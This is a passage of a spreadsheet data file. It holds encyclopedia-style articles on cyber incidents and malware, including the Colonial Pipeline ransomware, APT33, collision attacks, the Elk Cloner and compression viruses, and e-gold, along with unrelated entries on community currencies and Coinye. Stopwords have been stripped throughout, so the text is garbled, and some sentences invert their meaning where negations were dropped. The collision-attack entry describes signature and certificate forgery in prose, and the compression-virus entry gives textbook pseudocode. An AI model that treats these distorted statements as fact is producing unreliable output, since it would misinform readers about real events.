upcoming elections hack vote counting machines (vcms) since connected different server.the third hacker, identified, still large. measures april comelec announced making consultations microsoft cybersecurity experts based united kingdom, singapore united states. technical working group tasked look issue hacking also formed director james jimenez comelec information education department. website transferred department science technology's server. charges national privacy commission decided december 2016 (case 16-001) said comelec found responsible violating data privacy 2012 criminal prosecution chairman andres bautista recommended. also office personnel management data breach democratic national committee cyber attacks references</t>
  </si>
  <si>
    <t>Colonial Pipeline ransomware attack</t>
  </si>
  <si>
    <t>2021, colonial pipeline, american pipeline system originates houston, texas, carries gasoline fuel mainly southeastern united states, suffered ransomware cyberattack impacted computerized equipment managing pipeline. colonial pipeline company halted pipeline operations contain attack. overseen fbi, company paid amount asked hacker group bitcoin $4.4 million) within several hours; upon receipt ransom, tool provided colonial pipeline company darkside restore system. however, tool long processing time help system back time.the federal motor carrier safety administration issued regional emergency declaration states washington, d.c., keep fuel supply lines open largest cyberattack infrastructure target history united states. various media sources identified criminal hacking group darkside responsible party. group believed stolen gigabytes data company servers malware attack.on june department justice announced recovered 63.7 bitcoins (approximately $2.3 million) ransom payment. background colonial pipeline carries gasoline, diesel fuel texas away york. about fuel consumed east coast arrives pipeline system. attack came amid growing concerns vulnerability infrastructure (including critical infrastructure) cyberattacks several high-profile attacks, including 2020 solarwinds hack multiple federal government agencies, including defense, treasury, state, homeland security departments. impact primary target attack billing infrastructure company. actual pumping systems still able work. according sources company, inability bill customers reason halting pipeline operation. colonial pipeline reported shut pipeline precaution concern hackers might obtained information allowing carry attacks vulnerable parts pipeline. attack, colonial could confirm time pipeline would resume normal functions. attackers also stole nearly gigabytes data threatened release internet ransom paid. reported within hours attack company paid ransom nearly bitcoins million) hackers exchange decryption tool, proved slow company's business continuity planning tools effective bringing back operational capacity.on colonial stated planned substantially repair restore pipeline's operations week.in response fuel shortages charlotte douglas international airport caused pipeline shutdown, american airlines changed flight schedules temporarily. least flights honolulu london) fuel stops plane changes added schedules four-day period. shortage also required hartsfield–jackson atlanta international airport fuel suppliers, least five airports directly serviced pipeline.fuel shortages began occur filling stations amid panic buying pipeline shutdown entered fourth day. alabama, florida, georgia, north carolina, south carolina reported shortages. areas northern south carolina southern virginia hardest hit, filling stations running fuel charlotte percent stations washington, d.c. average fuel prices rose highest since 2014, reaching gallon. responses u.s. president biden declared state emergency 2021. during regular times limits amount petroleum products could transported road, rail, etc., domestically within u.s. mainland. however, declaration place, temporarily suspended.on georgia governor brian kemp declared state emergency, temporarily waived collection state's taxes motor fuels (diesel gasoline). response panic buying southeast, u.s. transportation secretary pete buttigieg u.s. energy secretary jennifer granholm cautioned gasoline hoarding, reiterating united states undergoing "supply crunch" rather shortage.on u.s. consumer product safety commission advised people "not fill plastic bags gasoline" containers meant fuel.biden signed executive order 14028 increasing software security standards sales government, tighten detection security existing systems, improve information sharing training, establish cyber safety review board, improve incident response. united states department justice also convened cybersecurity task force increase prosecutions.the department state issued statement $10,000,000 reward would given case information leading arrest darkside members. perpetrators darkside released statement directly mention attack, claimed "our goal make money, creating problems society." pipeline restart restart pipeline operations began p.m. ending six-day shutdown, although colonial pipeline company warned could take several days service return normal. pipeline company stated several markets served pipeline experience, continue experience, intermittent service interruptions restart. company also stated would move much gasoline, diesel fuel safely possible markets return normal. colonial pipeline systems operations returned normal after shutdown, average national cost rose highest years, average $3.04 gallon price increase pronounced southern states, prices rising cents carolinas, tennessee, virginia, georgia. around 10,600 stations still without 18.in 2021, interview wall street journal, joseph blount said ultimately decided $4.4 million ransom hackers breached company's systems; right thing country." also said, know that's highly controversial decision". investigations biden said though evidence russian government responsible attack, evidence darkside group russia, thus, russian authorities "have responsibility deal this". independent cybersecurity researchers also stated hacking group russian malware avoids encrypting files system language russian.in aftermath attack, revealed senate armed services cyber subcommittee hearing department homeland security alerted ransomware attack justice department alerted ransom type amount, prompting discussion numerous information silos government difficulties sharing.blockchain analytics firm elliptic published bitcoin wallet report showing million bitcoin ransom payments made darkside darkside affiliates last year, originating distinct wallets. according darktracer release 2226 victim organizations since 2019, organizations infected darkside malware suggesting approximately victims paid ransom average payment $1.9 million. darkside developer received bitcoins worth $15.5 million (17%), remaining $74.7 million (83%) going various affiliates. partial ransom recovery u.s. department justice issued press release june 2021, stating seized 63.7 bitcoins original ransom payment. value recovered bitcoins $2.3 million, trading price bitcoin fallen since date ransom payment. through possession private ransom account, able retrieve bitcoin, though disclose obtained private key. also steamship authority cyberattack health service executive cyberattack references external links media related colonial pipeline cyberattack wikimedia commons</t>
  </si>
  <si>
    <t>Collision attack</t>
  </si>
  <si>
    <t>cryptography, collision attack cryptographic hash tries find inputs producing hash value, i.e. hash collision. this contrast preimage attack specific target hash value specified. there roughly types collision attacks: classical collision attack find different messages hash(m1) hash(m2).more generally: chosen-prefix collision attack given different prefixes find appendages hash(p1 hash(p2 m2), denotes concatenation operation. classical collision attack mathematically stated, collision attack finds different messages hash(m1) hash(m2). classical collision attack, attacker control content either message, arbitrarily chosen algorithm. much like symmetric-key ciphers vulnerable brute force attacks, every cryptographic hash function inherently vulnerable collisions using birthday attack. birthday problem, attacks much faster brute force would hash bits broken 2n/2 time steps (evaluations hash function). more efficient attacks possible employing cryptanalysis specific hash functions. when collision attack discovered found faster birthday attack, hash function often denounced "broken". nist hash function competition largely induced published collision attacks commonly used hash functions, sha-1. collision attacks improved much that, 2007, takes seconds regular computer. hash collisions created usually constant length largely unstructured, cannot directly applied attack widespread document formats protocols. however, workarounds possible abusing dynamic constructs present many formats. way, documents would created similar possible order hash value. document would shown authority signed, signature could copied file. such malicious document would contain different messages document, conditionally display subtle changes file: some document formats like postscript, macros microsoft word, conditional constructs. (if-then-else) allow testing whether location file value another order control displayed. tiff files contain cropped images, different part image displayed without affecting hash value. files vulnerable collision attacks using color value (such text message displayed white color blends background, text message displayed dark color) altered change signed document's content. chosen-prefix collision attack extension collision attack chosen-prefix collision attack, specific merkle–damgård hash functions. case, attacker choose arbitrarily different documents, append different calculated values result whole documents equal hash value. this attack much powerful classical collision attack. mathematically stated, given different prefixes attack finds appendages hash(p1 hash(p2 (where concatenation operation). 2007, chosen-prefix collision attack found md5, requiring roughly evaluations function. paper also demonstrates x.509 certificates different domain names, colliding hash values. this means certificate authority could asked sign certificate domain, certificate (specially signature) could used create rogue certificate impersonate another domain.a real-world collision attack published december 2008 group security researchers published forged x.509 signing certificate could used impersonate certificate authority, taking advantage prefix collision attack hash function. this meant attacker could impersonate ssl-secured website man-in-the-middle, thereby subverting certificate validation built every browser protect electronic commerce. rogue certificate revokable real authorities, could also arbitrary forged expiry time. even though known weak 2004, certificate authorities still willing sign md5-verified certificates december 2008, least microsoft code-signing certificate still using 2012. flame malware successfully used variation chosen-prefix collision attack spoof code signing components microsoft root certificate still used compromised algorithm.in 2019, researchers found chosen-prefix collision attack sha-1 computing complexity 266.9 269.4 cost less 100,000 dollars. 2020, researchers reduced complexity chosen-prefix collision attack sha-1 263.4. attack scenarios many applications cryptographic hash functions rely collision resistance, thus collision attacks affect security. example, hmacs vulnerable. attack useful, attacker must control input hash function. digital signatures because digital signature algorithms cannot sign large amount data efficiently, implementations hash function reduce ("compress") amount data needs signed constant size. digital signature schemes often become vulnerable hash collisions soon underlying hash function practically broken; techniques like randomized (salted) hashing extra time requiring harder preimage attack.the usual attack scenario goes like this: mallory creates different documents identical hash value, i.e., collision. mallory seeks deceive accepting document ostensibly alice. mallory sends document alice, agrees document says, signs hash, sends signature mallory. mallory attaches signature document document mallory sends signature document bob, claiming alice signed because digital signature matches document hash, bob's software unable detect substitution.in 2008, researchers used chosen-prefix collision attack using scenario, produce rogue certificate authority certificate. they created versions public certificate, appeared legitimate submitted signing rapidssl certificate authority. second version, hash, contained flags signal browsers accept legitimate authority issuing arbitrary certificates. hash flooding hash flooding (also known hashdos) denial service attack uses hash collisions exploit worst-case (linear probe) runtime hash table lookups. originally described 2003. execute attack, attacker sends server multiple pieces data hash value tries server perform slow lookups. main focus hash functions used hash tables speed instead security, major programming languages affected, vulnerabilities class still showing decade original presentation.to prevent hash flooding without making hash function overly complex, newer keyed hash functions introduced, security objective collisions hard find long unknown. they slower previous hashes, still much easier compute cryptographic hashes. 2021, daniel bernstein's siphash (2012) widely-used hash function class. (non-keyed "simple" hashes remain safe long application's hash table controllable outside.) possible perform analogous attack fill bloom filters using (partial) preimage attack. references external links "meaningful collisions", attack scenarios exploiting cryptographic hash collisions fast collision generators bishop (formerly stach liu). create hash collisions using groundbreaking code improves upon techniques originally developed xiaoyun wang. using pentium collisions generated average minutes, collisions generated average seconds. originally released 22jun2006.</t>
  </si>
  <si>
    <t>ElephantDrive</t>
  </si>
  <si>
    <t>elephantdrive storage virtualization service used primarily online backup tool, also remote access service/collaboration tool. service runs windows, mac, linux, ios, android platforms, allows users create simple automated backups protecting data moving cloud-based elephantdrive account. architecture elephantdrive makes infrastructure-on-demand part architecture, first examples applications built amazon's (simple storage service). elephantdrive initially utilized amazon tool datacenter migration, quickly moved production infrastructure. history elephantdrive, inc. founded michael fisher widhelm 2005. elephantdrive launched service 2006. elephantdrive’s development initially based westwood village angeles, california.elephantdrive's first major product came conjunction 2008 closing early cloud storage provider property xdrive service offered free tool migrating files xdrive platform, simplifying process switching providers.the company turned focus network attached storage (nas) space, designing deploying cloud storage optimized natively devices series partnerships hardware makers themselves. initial partnership netgear's storage product line readynas systems form co-branded embedded cloud backup service called "readynas vault." additional cloud storage integration launched hardware makers qnap thecus, opted elephantdrive brand, opposed "vault" co-branding. elephantdrive also integrated devices manufactured synology.in 2022, elephantdrive acquired cybersecurity firm jungle disk. also list online backup services references external links official site</t>
  </si>
  <si>
    <t>Elfin Team</t>
  </si>
  <si>
    <t>advanced persistent threat (apt33) hacker group identified fireeye supported government iran. group also called refined kitten crowdstrike), magnallium dragos), holmium microsoft). history fireeye believes group formed later 2013. targets apt33 reportedly targeted aerospace, defense petrochemical industry targets united states, south korea, saudi arabia. modus operandi apt33 reportedly uses dropper program designated dropshot, deploy wiper called shapeshift, install backdoor called turnedup. group reported alfashell tool send spear-phishing emails loaded malicious html application files targets.apt33 registered domains impersonating many commercial entities, including boeing, alsalam aircraft company, northrop grumman vinnell. identification fireeye kaspersky noted similarities shapeshift shamoon, another virus linked iran. apt33 also used farsi shapeshift dropshot, active iran standard time business hours, remaining inactive iranian weekend.one hacker known pseudonym xman_1365_x linked turnedup tool code iranian nasr institute, connected iranian cyber army. xman_1365_x accounts iranian hacker forums, including shabgard ashiyane. also charming kitten references</t>
  </si>
  <si>
    <t>Eliza (computer virus)</t>
  </si>
  <si>
    <t>eliza computer virus discovered december 1991. infects files including command.com. reported defective, destroys .exe files creates. .com files deleted. avoid detection, alter dates files infects, increases length 1,193 1,194 bytes. also found later versions windows. strain forms eliza attacks ms-dos operating system reproducing .exe files. however, virus causes delete .exe files. because defective easy track, considered minimal threat. windows nt/2000/xp/vista/7 strain unknown whether person developed windows strain, much damaging considered legitimate threat. site reports following: remotely controls computer wastes system resources usage tracks internet activity keystrokes, allowing hacker record/steal passwords, credit card numbers, etc.the virus removed antivirus program, rebooting safe mode manually removing infected files. references</t>
  </si>
  <si>
    <t>Elk Cloner</t>
  </si>
  <si>
    <t>cloner first known microcomputer viruses spread wild", i.e., outside computer system laboratory written. attached apple operating system spread floppy disk. written around 1982 programmer entrepreneur rich skrenta 15-year-old high school student, originally joke, onto game disk. infection symptoms cloner spread infecting apple operating system using technique known boot sector virus. attached game play. 50th time game started, virus released, instead playing game, would change blank screen displayed poem virus. computer booted infected floppy disk, copy virus placed computer's memory. when uninfected disk inserted computer, entire (including cloner) would copied disk, allowing spread disk disk. prevent continually re-written time disk accessed, cloner also wrote signature byte disk's directory, indicating already infected. poem cloner would display follows: cloner: program with personality will your disks will infiltrate your chips it's cloner! will stick like glue will modify send cloner! cloner cause deliberate harm, apple disks without standard image reserved tracks overwritten. development cloner created skrenta prank 1982. skrenta already reputation pranks among friends because, sharing computer games software, would often alter floppy disks shut display taunting on-screen messages. reputation, many friends simply stopped accepting floppy disks him. skrenta thought methods alter floppy disks without physically touching harming them. during winter break lebanon high school lebanon, pennsylvania, skrenta discovered launch messages automatically apple computer. developed known boot sector virus, began circulating early 1982 among high school friends local computer club. twenty-five years later, 2007, skrenta called "some dumb little practical joke." distribution according contemporary reports, virus rather contagious, successfully infecting floppies people skrenta knew, upsetting many them.part "success" people wary potential problem, virus scanners cleaners available. virus could removed using apple's master create utility utilities re-write fresh copy infected disk. furthermore, cloner removed, previously-infected disk would re-infected since already contained cloner "signature" directory. also possible "inoculate" uninfected disks cloner writing "signature" disk; virus would think disk already infected refrain writing itself. references external links cloner (circa 1982)</t>
  </si>
  <si>
    <t>Community currencies</t>
  </si>
  <si>
    <t>economics, local currency currency spent particular geographical locality participating organisations. regional currency form local currency encompassing larger geographical area, community currency might local used exchange within online community. local currency acts complementary currency national currency, rather replacing aims encourage spending within local community, especially locally owned businesses. such currencies backed national government legal tender. about complementary currencies, including local currencies, listed complementary currency resource center worldwide database. terminology some definitions: complementary currency used complement national currency, medium exchange, usually legal tender.: community currency complementary currency used group common bond, residents locality, association, members business online community. local currency complementary currency used locality. regional currency local currency locality larger region. auxiliary currency, microcurrency, eco-money less common synonyms community local currency. (see example douthwaite wagman 1999) private currency currency issued individual, business non-governmental organization. complementary currencies type private currency. sectoral currency complementary currency used within economic sector, education health care. alternative currency generally, synonym complementary currency, referring currency designed work conjunction national currency; less often refers type private currency attempts supplant circumvent national currency. purpose local currencies using money tool achieve social environmental objectives. according economics foundation partner community currencies action: money simply social technology ways designed, produced controlled neutral predetermined factors influence effects upon society large. some purposes community currencies identified community currencies action include: democratizing services organisations: time credits volunteering encourage people actively engage community making services, elderly care, democratic. zeitvorsoge, makkie supporting small medium enterprises: community currencies serve means promote independent shops large corporations since keep circulating locally. they also help smes support financially lending receiving credit, goods services within currency network. examples are: bristol pound, sonantes, tradeqoin, chiemgauer countering inequality social exclusion: specially designed currencies address inequality issues giving everyone chance involved community; instance rewarding participation voluntary programs. (spice time credits, makkie) addressing environmental impacts: community currencies play role better valuation environmental resources providing incentive sustainable behavior. example, belgian portemonnee rewards residents environmentally positive actions composting. reward currencies also encourage businesses adopt environmentally sound practices. benefits wörgl experiment illustrates common characteristics major benefits local currencies. local currencies negative interest rate demurrage tend circulate much rapidly national currencies. amount currency circulation employed times results greater overall economic activity. produces greater benefit unit. higher velocity money result negative interest rate encourages people spend money quickly. local currencies enable community fully existing productive resources, especially unemployed labor, catalytic effect rest local economy. they based premise community fully using productive capacities, lack local purchasing power. alternative currency used increase demand, resulting greater exploitation productive resources. long local economy functioning less full capacity, introduction local currency need inflationary, even results significant increase total money supply total economic activity. since local currencies accepted within community, usage encourages purchase locally produced locally-available goods services. thus, level economic activity, benefit accrues local community less drains parts country world. instance, construction work undertaken local currencies employs local labor uses possible local materials. enhanced local effect becomes incentive local population accept scrips. some forms complementary currency promote fuller resources much wider geographic area help bridge barriers imposed distance. fureai kippu system japan issues credits exchange assistance senior citizens. family members living parents earn credits offering assistance elderly local community. credits transferred parents redeemed local assistance. airline frequent flyer miles form complementary currency promotes customer-loyalty exchange free travel. airlines offer coupons seats less heavily sold flights seats normally empty, thus providing benefit customers relatively cost airline. while currencies restricted small geographic area country, internet electronic forms complementary currency used stimulate transactions global basis. china, tencent's coins virtual form currency gained wide circulation. coins bought renminbi used virtual products services ringtones on-line video game time. they also obtained on-line exchange goods services twice renminbi price, additional 'money' directly created. though virtual currencies 'local' traditional sense, cater specific needs particular community, virtual community. once circulation, total effective purchasing power on-line population case local currencies. chinese government begun coins exchanged virtual currency actual hard currency. difficulties criticisms local currencies transition towns movement criticized failing address needs wider population, especially lower socio-economic groups. such local currency initiatives widely criticized limited success stimulating spending local economies, unrealistic strategy reduce carbon emissions. modern local currencies modern local currencies classified following distinct types: transition currency based local currencies used transition towns movement they include brixton pound bristol pound berkshares usa, salt spring dollars canada. transition currencies payment voucher-based systems exchangeable national currency. between 2002-2014 many experiments local currency took form. such currencies raise resilience local economies encouraging re-localisation buying food production. drive change arisen range community-based initiatives social movements. transition towns movement originating used local currencies re-localisation face energy descent peak climate change. other drives include movements clone town big-box trends. rewards currency based frequent flyer model. consumer spends cash participating businesses issue rewards points local currency. these rewards points used offset cash prices future purchases. example oakland grown oakland, mutual credit currency based mutual credit system. this sub-divided two: time-based currency also known time banks time measure value. example dane county time bank. trade exchanges lets (local exchange trading system) price measure value. example local currency implemented trade exchange bucks area california, usa. lets originally started vancouver, canada, presently lets systems operating canada united kingdom. australia, france, zealand, switzerland similar systems. software several software packages written supporting management community currencies. 1998, richard kay, senior lecturer birmingham city university, wrote "multi-registry system" specification routing processing community currency transactions using approach designed decentralized, single point control failure, using domain name system server discovery. list local currencies also references further reading people powered money: designing, developing delivering community currencies (2015) community currencies action (https://neweconomics.org/uploads/files/0dba46d13aa81f0fe3_zhm62ipns.pdf pdf]) overview parallel, local community currency systems demeulenaere, (1998) complementary currency resource centre economic analysis contemporary local currencies united states krohn, snyder, (2008) international journal community currency research, vol. pages 53–68</t>
  </si>
  <si>
    <t>Coinye</t>
  </si>
  <si>
    <t>coinye, formerly coinye west, scrypt-based cryptocurrency issued cease desist letters using likeness american artist kanye west mascot, despite west affiliation project. project abandoned original developers following west's filing trademark infringement lawsuit them. history release coinye originally slated release january 2014, legal pressure prompted david mcenery development team release source code mining software january days ahead schedule. early press materials promised proper fair release, pre-allocation coins. however, later statements developers confirmed approximately 0.37% maximum money supply coinye reserved creators coin launch. developers claimed cover unexpected legal development costs. trademark infringement lawsuit january 2014, kanye west's lawyers sent development team cease desist order basis then-unreleased currency constituted trademark infringement, unfair competition, cyberpiracy dilution. response legal threats, development team changed name currency "coinye west" "coinye" moved domain name. january 2014, development team stated removed references west instead half-man-half-fish hybrid," south park episode west fails realize people jokingly calling "gay fish." these actions sufficient appease west's legal team lawsuit filed creators coin, prompting sell coinye holdings leave project. developer departure community takeover january 2014, representative coinye announced reddit "the developers basically dumped coins exchange left scene." coinye's official site replaced text reading "coinye dead. win, kanye." original website down. decline (2014-2020) resurgence (2021-2022) coinye called "defunct" numerous publications. coinye's global block difficulty fell 1.012 january 2014 2014, indicating network's total processing power fell roughly time. west sued coinye, predictions hypothetical value approximately twenty times original worth, 2017. 2017, trading mining coinye. despite this, coinye still exists today testament power decentralization. there consistent mining activity since launch, remaining mining pool. coinye still traded litecoin freixlite devcoin's community manager, daniel treccia successfully petitioned freixlite exchange listing, first coinye listing years exchange. also meme coin references external links archived website</t>
  </si>
  <si>
    <t>Community currency</t>
  </si>
  <si>
    <t>Commwarrior</t>
  </si>
  <si>
    <t>commwarrior symbian bluetooth worm first spread multimedia messaging service (mms) bluetooth. worm affects nokia series software platform. infection commwarrior particularly effective vector used infect phones. appeared though sent source known victim, leading even security-conscious users open infected message. actually, message sent random contact sender's address book. once message opened, virus attempts install phone file. runs, worm executed every time phone switched on.a secondary method infection create malicious .sis file compromised phone. once minute thereafter, worm attempts send file phone bluetooth enabled. symptoms according sophos, installation program chance displaying following text: "commwarrior v1.0 2005 e10d0r" references</t>
  </si>
  <si>
    <t>Compression virus</t>
  </si>
  <si>
    <t>compression virus example benevolent computer virus, invented fred cohen. searches uninfected executable file, compresses file prepends virus described pseudo code program compression-virus:= {01234567; subroutine infect-executable:= {loop:file get-random-executable-file; first-line-of-file 01234567 goto loop; compress file; prepend compression-virus file; main-program:= ask-permission infect-executable; uncompress the-rest-of-this-file tmpfile; tmpfile;} 01234567 virus signature, used make sure first-line-of-file 01234567) file already infected. virus asks permission (ask-permission) infect random executable (get-random-executable-file). permission granted, compresses executable (infect-executable), prepends (prepend), uncompresses current executable file (uncompress the-rest-of-this-file) temporary file (tmpfile) runs (run tmpfile). cruncher example compression virus, strain cruncher.2092 described mcafee memory-resident virus infects small files, making smaller. reason excluding small programs infected versions bigger originals. references</t>
  </si>
  <si>
    <t>E-gold</t>
  </si>
  <si>
    <t>e-gold digital gold currency operated gold silver reserve inc. (g&amp;sr) e-gold ltd. allowed users open account site denominated grams gold precious metals) ability make instant transfers value ("spends") e-gold accounts. e-gold system launched online 1996 grown five million accounts 2009, transfers suspended legal issues. peak 2006, e-gold processing us$2 billion worth transactions year, monetary base us$71 million worth gold (~3.5 metric tonnes), indicating high monetary turnover (velocity) times year (for comparison, annual velocity less e-gold ltd. incorporated nevis, saint kitts nevis operations conducted florida, usa. beginnings e-gold founded oncologist douglas jackson attorney barry downey 1996. pair originally backed services accounts gold coins stored bank safe deposit melbourne, florida. 1998, g&amp;sr (the system operator) affiliate member nacha full member nacha's internet council.the company launched years paypal manifest exponential growth 2000. 2004, million accounts. first successful digital currency system gain widespread user base merchant adoption, noted july 1999 financial times “the electronic currency achieved critical mass web”. also first non-credit-card payment service provider offer application programming interface (api) enabling services e-commerce transactions built after initial demonstration e-gold spend palm pilot february 1999, e-gold introduced support wireless mobile payments.e-gold used individuals merchants services including metals trading, online merchants, online auctions, online casinos, political organizations, non-profit organizations.from 1996 1999, currency exchange services referred “inexchange” “outexchange” directly supported e-gold platform. this arrangement exposed system’s operator, g&amp;sr, financial risks attendant provision exchange services. also tended inhibit third parties offering exchange services independent competitive basis. 2000, system re-structured effect separation currency exchange activities core functions e-metal issuance settlement transfers. g&amp;sr devolved ownership responsibility core functions e-gold ltd., newly formed offshore company organized express purpose. g&amp;sr itself, customer e-gold, continued offer exchange services newly created omnipay brand. beginning spring 2000, proliferation independent exchange services marking first emergence industry providing exchange conventional national currencies privately issued brand money. 2001, several dozen companies individuals around world offering third party exchange services national currencies e-gold, extending e-gold's international user base. e-gold, allowed transactions small ten-thousandth gram gold, also world's successful micropayment system. company's payment statistics published live showed hundreds thousands micro-transactions made daily computer programs using api. from inception 1996, e-gold pioneered decoupling numeraire specifying payment (spend) instruction native unit account settlement currency. example, aug® (the trademarked designation e-gold) denominated grams decimal fractions troy ounces since, weight units, related fixed arithmetic ratio), spend instruction might specified "pay [recipient account] worth e-gold". calculation actual quantity convey made using table reference exchange rates maintained company, reflecting current actual exchange rates published exchange providers.by early 2000s (decade), capability immediate settlement, implemented e-gold, recognized emergence systems peer-to-peer transfers digital rights “smart contracts”. governance e-gold unique time created "e-gold special purpose trust" held title physical bullion behalf users. they also created real-time statistical reports page showed total holdings metal trust account, list gold bars serial numbers, total number accounts, well total number value transactions previous hours. this transparency enabled many observations made e-gold used. criminal abuse e-gold's early success contributed demise. e-gold's store value large user base made early target financial malware phishing scams increasingly organized criminal syndicates. technique refined attacks digital gold systems like e-gold later used attack financial institutions starting 2003. hackers failing prospectively verify identity account holders, e-gold began suffer increasing rate criminal activity mainly perpetrated russian ukrainian hackers users. addition phishing, attackers made widespread flaws microsoft windows operating systems internet explorer browser collect account details millions computers compromise e-gold accounts.jackson's theory e-gold book entry system account histories, making simple conduct investigation track identify users engaged illicit activity fact. while public perception e-gold accounts anonymous, e-gold accounts pseudonymous, allowing creator account name label wished use. however, account transaction records—even failed log-in attempts—were permanently recorded, enabling linkage seemingly unrelated accounts secretly unified control. data mining enabled, combined inputs independent exchange services, enabled enforcement identify numerous criminal users service. fraud various fraud artists western countries also able take advantage e-gold system means funding schemes, enabling first time history, international ponzi schemes. perpetrators auction fraud ebay would sell fake non-existent items site. these criminal syndicates preferred victims e-gold fastest easiest move funds overseas.the increase online crime linked e-gold complaints government authorities defrauded account holders, often understand difference e-gold fraudulent person company encouraged open e-gold account wire money fund systemic problems online transactions system exchange agents worldwide, e-gold enabled criminals hackers romania move money quickly easily victims america back country attacks originating. several cyber crime gangs plagued used e-gold based râmnicu vâlcea, romania.e-gold unknowingly part larger systemic problem banking system. banking credit system united states designed digital environment, therefore fundamentally insecure highly vulnerable identity theft check fraud, well trust based attacks phishing. willingness credit card companies allow people apply card without identified person enabled rapid growth identity theft. (ironically, verifying identities account holders would main criticisms raised e-gold.) cybercrime there early reports e-gold actively helped catch collar cyber criminals, stole cisco systems' firewall code offered sale paid e-gold. june 2007, jackson claimed "aided investigations reported 3,000 suspected child pornography buyers national center missing exploited children". goldmoney, federal enforcement agencies began characterize e-gold payment system choice criminals, terrorists child pornographers. criminal prosecution changing definition money transmitter patriot act, passed wake september attacks five years e-gold launched, made federal crime operate money transmitter business without state money transmitter license state required license. time money transmitter states defined business cashed checks accepted cash remittances send person another person across international borders, western union moneygram. example, prior 2010, california regulated money transmitters "transmission money abroad law". e-gold's competitors, e-bullion company, applied money transmitter license state california 2002, informed state california business dealt gold accounts fall state's definition money transmitter. 2005, g&amp;sr requested sb/se division conduct (bank secrecy act) compliance examination order clarify regulations, any, e-gold fell under. united states treasury issued report january 2006 titled u.s. money laundering threat assessment g&amp;sr believed evidence favorable legal case explained january 2006 letter, apparently confirming e-gold accounts excluded definition "currency" united states congress code federal regulations definitions. however, actions 2006-2008, u.s. treasury department conjunction united states department justice stretched definition money transmitter patriot include system allows transfer kind value person another, merely national currency cash. using interpretation proceeded prosecute usa-based gold systems, e-gold (and later e-bullion) patriot money transmitter licenses, even though companies previously cooperating regulatory authorities told fall definition money transmitter. charge money transmitter license eventually dropped e-bullion. several years later fincen expanded definition apply foreign companies allowing persons open accounts, forced jersey based goldmoney.com suspend ability transfer value holder another december 2011.a november 2013 article financial times noted "for several years, jackson hoped resurrect e-gold himself, became clear would able obtain money transmitter licenses required states." allegations e-gold banks suffer problems criminal activity, phishing, ponzi schemes money laundering much larger scale, biggest banks even knowingly participated money laundering. e-gold's status controversial alternative currency system made attractive target. while e-gold begun implementing stronger controls abuse users system 2005, actively combating system child pornography founding member financial coalition against child pornography, justice department indicted e-gold directors four counts violating money laundering regulations knowingly allowing transaction purchase child pornography. government action e-gold case first impression. noted prosecutor, “digital currencies forefront international fund transfers. e-gold prominent digital currency there. attention entire digital currency world. that world wild west right now. people looking rules consequences.” resolution case e-gold brought title section 1960 united states america e-gold, ltd, district columbia court. e-gold filed motion dismiss case grounds definition money transmitter. court ruled e-gold, stating business clearly engage money transmitting without limiting transactions cash currency would commit crime without licensed." this ruling enshrined case treasury department's expansion definition money transmitter include system stored value kind transferred person another, even stored value neither cash, national currency. after vigorously contesting charges year, july 2008 company three directors entered plea agreement. jackson pleaded guilty "operation unlicensed money transmitting business" "conspiracy engage money laundering". agreement detailed actions required bring companies compliance laws regulations governing operation money transmitting business. concurrently, companies agreed consent order forfeiture, dropping action recover funds previously seized government.sentencing scheduled occur days following entry plea agreements order afford 90-day interval implement compliance requirements. status report detailing progress regard mandated compliance measures filed november 2008.in november 2008, gold silver reserve douglas jackson sentenced hours community service, $200 fine, three years supervision, including months electronically monitored home detention. faced maximum sentence years prison $500,000 fine. commenting substantial deviation federal sentencing guidelines direction leniency), judge rosemary collyer, already noted doubt jackson respect law” “the intent engage illegal conduct”, determined: “there reason shut e-gold g&amp;sr, every reason come legal compliance”. jackson's lawyer claimed jackson spared heavier fine deeply debt judge said "dr. jackson suffered, continue suffer, never successful e-gold". reid jackson, douglas jackson's brother, e-gold director barry downey sentenced three years probation hours community service, ordered $2,500 fine $100 assessment. suspension service e-gold value access plan (vap) 2007 e-gold indictment accompanied seizures (and forced redemption) e-gold balances multiple exchange providers, resulting almost overnight decline amount e-gold circulation (and gold reserves) metric tonnes. exchanger except g&amp;sr charged crime seized value subsequently returned them.] additionally, government filed post-indictment restraining order (piro) prohibited redemption e-gold gold bullion without approval prosecutor. primary purpose piro prevent dispersion assets (the gold reserves) government unable seize custodial arrangements whereby e-gold bullion reserve special purpose trust held title gold. combination adverse publicity disrupted exchange markets precipitous decline e-gold usage demand. whereas normal circumstances decrease demand would resulted decrease circulation (without impacting exchange rates), combination e-gold users unable exchange e-gold conventional money discouraged potential recipient accepting payment e-gold. 2008, plea agreement detailed requirements e-gold resume operation regulated financial institution. while e-gold already complied majority requirements time sentencing, discovered guilty plea effectively precluded companies company controlled e-gold directors) licenseable state. accordance plea, e-gold suspended remaining spend activity, effect locking e-gold account balances. challenge restore customer access value e-gold accounts. lacking licenses money transmitting business, plan liquidate system distribute value customers would risk construed additional violation operating without required licenses. 2009, e-gold directors approached government proposal whereby government might serve middleman disbursing value e-gold customers. following year negotiation, e-gold approved calling monetization reserves claims mechanism, authority oversight judge hollander. protocol entailed companies consenting voluntary seizure action aggregate e-gold. companies responsible “monetizing” value, redeeming e-gold, liquidating bullion released reserves turning proceeds secret service. fortuitous drop value relative e-gold, realized monetization rate $1583 troy ounce, twice maximum e-gold exchange rate interval spend activity curtailed suspended 2007-2009. altogether, g&amp;sr turned $92.8 million secret service 2012. some e-metal e-gold accounts criminally derived, much e-metal owned innocent account holders. court ordered rust consulting, private company maryland, process refunds account holders following validation identity e-gold. balance unclaimed funds forfeited government. three-month window june 2013 october 2013 e-gold account holders submit claim funds, extended december 2013. aftermath after e-gold e-bullion cases, california (2010) several states amended regulations follow federal precedent define digital value transfer systems money transmitters. however, california's 2010 worded define range internet startup companies, room booking service airbnb, "money transmitters".e-gold early pioneer internet payments. company first successful online payment system pioneered many systems techniques e-commerce, including making payments encrypted connection, offering enable websites build services using e-gold's transaction system. though e-gold ultimately shut government, federal judge case ruled founders e-gold "had intent commit illegal activity." after resolution criminal case, directors e-gold vowed continue operations following federal know customer guidelines. e-gold's failure ultimately inability provide system reliable user identification failure provide workable dispute resolution system identify illegal abusive activity user community. other transaction systems webmoney.ru goldmoney.com learned e-gold's mistakes able successfully field similar systems rates abuse addressing deficiencies. while paypal done better addressing abuse e-gold did, contend kind internet fraud took e-gold. financial cryptographers observed bitcoin repeated fundamental errors e-gold made, despite decentralized nature cyber crime-wave might bring bitcoin similar ending. according goldmoney's website, bitgold announced acquisition goldmoney 2015. petition vacate 2008 convictions july 2020, e-gold ltd, gold silver reserve, inc, douglas jackson, barry downey, reid jackson filed writ coram nobis petition united states district court district columbia seeking vacate, prejudice, 2008 convictions. 